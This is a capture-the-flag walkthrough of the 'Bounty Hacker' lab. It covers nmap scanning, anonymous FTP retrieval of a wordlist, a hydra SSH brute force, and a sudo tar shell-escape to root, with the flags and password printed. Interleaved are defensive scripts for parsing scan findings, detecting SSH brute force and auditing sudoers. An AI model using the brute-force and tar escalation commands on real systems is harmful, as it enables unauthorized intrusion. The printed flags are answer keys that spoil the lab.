You talk a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
You were constantly bragging about your elite hacker skills at the bar, and a few Bounty Hunters decided they would take you up on it! Prove your status is more than a few drinks at the bar. I sense bell peppers & beef in your future!
Deploy the machine.
Find the open ports on the machine.
Scan the ports.
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sC -sV -A -vv 10.10.237.251
[sudo] password for cyber:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 02:31 WIT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:31
Completed NSE at 02:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:31
Completed NSE at 02:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:31
Completed NSE at 02:31, 0.00s elapsed
Initiating Ping Scan at 02:31
Scanning 10.10.237.251 [4 ports]
Completed Ping Scan at 02:31, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:31
Completed Parallel DNS resolution of 1 host. at 02:31, 13.00s elapsed
Initiating SYN Stealth Scan at 02:31
Scanning 10.10.237.251 [1000 ports]
Discovered open port 80/tcp on 10.10.237.251
Discovered open port 21/tcp on 10.10.237.251
Discovered open port 22/tcp on 10.10.237.251
Completed SYN Stealth Scan at 02:32, 49.72s elapsed (1000 total ports)
Initiating Service scan at 02:32
Scanning 3 services on 10.10.237.251
Completed Service scan at 02:32, 7.66s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.237.251
Retrying OS detection (try #2) against 10.10.237.251
Initiating Traceroute at 02:32
Completed Traceroute at 02:32, 0.76s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 02:32
Completed Parallel DNS resolution of 2 hosts. at 02:33, 13.00s elapsed
NSE: Script scanning 10.10.237.251.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:33
NSE: [ftp-bounce 10.10.237.251:21] PORT response: 500 Illegal PORT command.
Completed NSE at 02:33, 18.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:33
Completed NSE at 02:33, 4.37s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:33
Completed NSE at 02:33, 0.00s elapsed
Nmap scan report for 10.10.237.251
Host is up, received echo-reply ttl 63 (0.72s latency).
Scanned at 2021-03-02 02:31:31 WIT for 118s
Not shown: 967 filtered ports
Reason: 967 no-responses
PORT STATE SERVICE REASON VERSION
20/tcp closed ftp-data reset ttl 63
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
|_-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.169.148
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQjCajO395PlZ0SBNDdN+B14E0m6lRY9GlyCD9hvwwB
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
| 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
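The scan report above already contains the findings a defender would want to act on (anonymous FTP with two readable files, FTP and HTTP running in cleartext). As an added example that is not part of this writeup, the script below parses nmap's normal-output format, attaches each NSE script block to its port, and turns the result into a remediation list. The embedded report is an excerpt of the scan shown above; the parsing rules (a port line ends in "ttl N version", a script block starts with a lowercase hyphenated name) are the author's assumptions about the format, not an nmap API.

```python
import re
from dataclasses import dataclass, field

# Excerpt of the nmap report shown above, embedded so the parser runs offline.
NMAP_REPORT = """\
PORT STATE SERVICE REASON VERSION
20/tcp closed ftp-data reset ttl 63
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
|_-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
| ftp-syst:
| STAT:
| Control connection is plain text
| Data connections will be plain text
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
"""

# One port line: "21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3" (version may be empty)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s+ttl\s+\d+\s*(.*)$")
# Start of an NSE script block: "ftp-anon: ...". Script names are lowercase with a hyphen,
# which keeps lines such as "STAT:" or "TYPE: ASCII" inside ftp-syst from starting a new block.
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9]*(?:-[a-z0-9]+)+):\s*(.*)$")

CLEARTEXT_SERVICES = {"ftp", "http", "telnet"}


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> list of output lines


def parse_nmap(text):
    """Parse nmap 'normal' output into PortRecords, attaching NSE output to its port."""
    records, current, script = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = PortRecord(int(m[1]), m[2], m[3], m[4], m[6].strip())
            records.append(current)
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        body = (line[2:] if line.startswith("|_") else line[1:]).strip()
        sm = SCRIPT_RE.match(body)
        if sm:
            script = sm[1]
            current.scripts[script] = [sm[2]] if sm[2] else []
        elif script is not None:
            current.scripts[script].append(body)
    return records


def anonymous_ftp_files(rec):
    """Return the file names listed by ftp-anon, or None if anonymous login was not reported."""
    lines = rec.scripts.get("ftp-anon", [])
    if not lines or "Anonymous FTP login allowed" not in lines[0]:
        return None
    # Listing lines start with a mode string such as -rw-rw-r--; the name is the last field.
    return [ln.split()[-1] for ln in lines[1:] if ln[:1] and ln[:1] in "-dl"]


def findings(records):
    """Turn the parsed report into the remediation items a defender would raise."""
    out = []
    for rec in records:
        if rec.state != "open":
            continue
        tag = f"{rec.port}/{rec.proto}"
        if rec.service in CLEARTEXT_SERVICES:
            out.append(f"{tag} {rec.service}: cleartext protocol, credentials and data readable on the wire")
        files = anonymous_ftp_files(rec)
        if files is not None:
            out.append(f"{tag}: anonymous FTP login allowed; exposed files: {', '.join(files) or 'none listed'}")
    return out


if __name__ == "__main__":
    for item in findings(parse_nmap(NMAP_REPORT)):
        print(item)
```

Run against the embedded excerpt it reports three items: cleartext FTP, anonymous FTP exposing locks.txt and task.txt, and cleartext HTTP; the closed port 20 is ignored and SSH produces nothing.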
Who wrote the task list?
This stage makes us think a little about how to find out who wrote the locks.txt and task.txt files. Next, we log in over FTP by running the following commands:
┌─[cyber@cyber]─[~/Downloads]
└──╼ $ftp
ftp> o
(to) 10.10.237.251
Connected to 10.10.237.251.
220 (vsFTPd 3.0.3)
Name (10.10.237.251:cyber): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
Run the help command to see which commands are available.
ftp> help
Commands may be abbreviated. Commands are:
! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> pwd
257 "/" is the current directory
ftp>
Since the command list above has no 'cat' for reading the two files, we transfer both files to our own computer by running the following commands:
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.09 secs (4.5146 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (510.8173 kB/s)
ftp>
Open a new terminal and view the files. Make sure you are not inside the FTP session we just logged into; go to the local directory you used and cat the files.
┌─[cyber@cyber]─[~/Downloads/FTP]
└──╼ $ls
locks.txt task.txt
┌─[cyber@cyber]─[~/Downloads/FTP]
└──╼ $cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
┌─[cyber@cyber]─[~/Downloads/FTP]
└──╼ $cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
Answer = lin
What service can you bruteforce with the text file found?
Run a brute force with hydra against the ssh port using the locks.txt file as the password list. Run the following command:
┌─[cyber@cyber]─[~]
└──╼ $hydra -l lin -P Downloads/FTP/locks.txt 10.10.237.251 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-02 04:10:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 26 login tries (l:1/p:26), ~7 tries per task
[DATA] attacking ssh://10.10.237.251:22/
[22][ssh] host: 10.10.237.251 login: lin password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-02 04:11:14
Answer = RedDr4gonSynd1cat3
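On the target, the hydra run above leaves a burst of "Failed password" lines in /var/log/auth.log from one source, followed by one "Accepted password". As an added example that is not part of this writeup, the detector below reads sshd auth lines, counts failures per source IP inside a sliding time window, and raises a second alert when a flagged source then authenticates successfully. The log excerpt is constructed (the hostname bountyhacker and the addresses are taken from the output above, the PIDs and ports are made up); the year is assumed because syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not captured from the target): the shape sshd logs while the
# hydra run above guesses passwords for 'lin', then one success, then an unrelated lone failure.
SAMPLE_AUTH_LOG = """\
Mar  2 04:10:49 bountyhacker sshd[2041]: Failed password for lin from 10.9.169.148 port 50412 ssh2
Mar  2 04:10:50 bountyhacker sshd[2042]: Failed password for lin from 10.9.169.148 port 50413 ssh2
Mar  2 04:10:50 bountyhacker sshd[2043]: Failed password for lin from 10.9.169.148 port 50414 ssh2
Mar  2 04:10:51 bountyhacker sshd[2044]: Failed password for lin from 10.9.169.148 port 50415 ssh2
Mar  2 04:10:52 bountyhacker sshd[2045]: Failed password for lin from 10.9.169.148 port 50416 ssh2
Mar  2 04:10:53 bountyhacker sshd[2046]: Failed password for lin from 10.9.169.148 port 50417 ssh2
Mar  2 04:10:55 bountyhacker sshd[2047]: Failed password for lin from 10.9.169.148 port 50418 ssh2
Mar  2 04:11:14 bountyhacker sshd[2055]: Accepted password for lin from 10.9.169.148 port 50430 ssh2
Mar  2 04:11:14 bountyhacker sshd[2055]: pam_unix(sshd:session): session opened for user lin by (uid=0)
Mar  2 04:20:03 bountyhacker sshd[2101]: Failed password for invalid user admin from 192.168.0.14 port 41002 ssh2
""".splitlines()

# OpenSSH password-auth lines; "invalid user" appears when the account does not exist.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)


def parse_line(line, year=2021):
    """Parse one sshd auth line; syslog timestamps have no year, so one is assumed."""
    m = SSHD_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Alert once when a source reaches `threshold` failures inside `window_s` seconds, and
    again if that source later logs in successfully (a likely guessed credential)."""
    alerts = []
    recent_failures = defaultdict(deque)  # src -> failure timestamps still inside the window
    flagged = set()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent_failures[ev["src"]]
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            while q and (ev["ts"] - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and ev["src"] not in flagged:
                flagged.add(ev["src"])
                alerts.append(("BRUTE_FORCE", ev["src"], ev["user"], len(q)))
        elif ev["src"] in flagged:
            alerts.append(("SUCCESS_AFTER_FAILURES", ev["src"], ev["user"], len(q)))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

On the sample, the source 10.9.169.148 is flagged at its fifth failure and again when the "Accepted password" line arrives; the single failure from 192.168.0.14 never reaches the threshold. The second alert is the one worth paging on, since a brute force that ends in a success means the account is now in use by the attacker.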
user.txt
Next, log in over ssh using the user and password we obtained.
┌─[cyber@cyber]─[~]
└──╼ $ssh lin@10.10.237.251 -p 22
The authenticity of host '10.10.237.251 (10.10.237.251)' can't be established.
ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.237.251' (ECDSA) to the list of known hosts.
lin@10.10.237.251's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}
lin@bountyhacker:~/Desktop$
Answer = THM{CR1M3_SyNd1C4T3}
root.txt
Now we look for the root.txt flag, which requires root permissions. For reference, also read the GTFOBins article.
Run the following commands:
lin@bountyhacker:~$ sudo -h
sudo - execute a command as another user
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
Options:
-A, --askpass use a helper program for password prompting
-b, --background run command in the background
-C, --close-from=num close all file descriptors >= num
-E, --preserve-env preserve user environment when running command
-e, --edit edit files instead of running a command
-g, --group=group run command as the specified group name or ID
-H, --set-home set HOME variable to target user's home dir
-h, --help display help message and exit
-h, --host=host run command on host (if supported by plugin)
-i, --login run login shell as the target user; a command may also be specified
-K, --remove-timestamp remove timestamp file completely
-k, --reset-timestamp invalidate timestamp file
-l, --list list user's privileges or check a specific command; use twice for longer format
-n, --non-interactive non-interactive mode, no prompts are used
-P, --preserve-groups preserve group vector instead of setting to target's
-p, --prompt=prompt use the specified password prompt
-r, --role=role create SELinux security context with specified role
-S, --stdin read password from standard input
-s, --shell run shell as the target user; a command may also be specified
-t, --type=type create SELinux security context with specified type
-U, --other-user=user in list mode, display privileges for user
-u, --user=user run command (or edit file) as specified user name or ID
-V, --version display version information and exit
-v, --validate update user's timestamp without running a command
-- stop processing command line arguments
lin@bountyhacker:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
# cd /root
# ls
root.txt
# cat root.txt
THM{80UN7Y_h4cK3r}
Answer = THM{80UN7Y_h4cK3r}
Okay, finished.
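The root step works because sudo lets lin run tar as root with whatever arguments lin chooses. As an added example that is not part of this writeup, the audit script below parses sudoers user-specification lines and flags the grants that make that possible: a shell-escape-capable binary allowed without fixed arguments, `ALL` for an ordinary user, wildcards in arguments, and NOPASSWD. The sudoers content is constructed (the target's real /etc/sudoers is not shown on this page), and the `lin` line is the author's guess at a rule that would produce the behaviour seen above. Aliases are skipped rather than expanded, and only tar is listed as a shell-escape binary; GTFOBins' sudo section is the reference for extending that set.

```python
import os
import re
from dataclasses import dataclass

# Constructed sudoers content, not the target's real /etc/sudoers. The 'lin' line is the
# author's model of a grant that lets 'sudo tar' run as root without a password, as above.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
lin     ALL=(root) NOPASSWD: /bin/tar
deploy  ALL=(root) NOPASSWD: /usr/sbin/service app-*
guest   ALL=(ALL) ALL
ops     ALL=(root) /usr/sbin/service apache2 restart   # narrow grant with fixed arguments
"""

# user_or_%group  hosts=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

# Binaries that execute arbitrary commands when allowed with unrestricted arguments.
# Only the one abused above is listed; extend from GTFOBins' sudo section.
SHELL_ESCAPE_BINS = {"tar"}


@dataclass
class Rule:
    who: str
    hosts: str
    runas: str
    tags: list
    commands: list


def parse_sudoers(text):
    """Parse user-specification lines; comments, Defaults and alias definitions are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        rest, tags = m["rest"], []
        while True:
            t = TAG_RE.match(rest)
            if t is None:
                break
            tags.append(t[1])
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append(Rule(m["who"], m["hosts"], m["runas"] or "root", tags, commands))
    return rules


def audit(rules):
    """Return (severity, who, command, reason) findings for risky sudo grants."""
    out = []
    for r in rules:
        for cmd in r.commands:
            if cmd == "ALL":
                if r.who != "root" and not r.who.startswith("%"):
                    out.append(("HIGH", r.who, cmd, "unrestricted command list for an ordinary user"))
                continue
            path, *args = cmd.split()
            name = os.path.basename(path)
            if name in SHELL_ESCAPE_BINS and not args:
                out.append(("HIGH", r.who, cmd, f"{name} with arbitrary arguments can spawn a root shell"))
            if any("*" in a or "?" in a for a in args):
                out.append(("MEDIUM", r.who, cmd, "wildcards in sudoers match across argument boundaries"))
        if "NOPASSWD" in r.tags:
            out.append(("LOW", r.who, ", ".join(r.commands), "NOPASSWD removes the password check"))
    return out


if __name__ == "__main__":
    for finding in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(finding)
```

On the sample, lin's tar grant and guest's `ALL` are reported as HIGH, deploy's wildcard as MEDIUM, and both NOPASSWD grants as LOW, while ops' fixed-argument service command produces nothing. The fix for the lin case is the one the audit implies: either drop the grant or pin tar to the exact arguments the job needs, since any binary that can run a sub-command needs its argument list locked down before it is handed root.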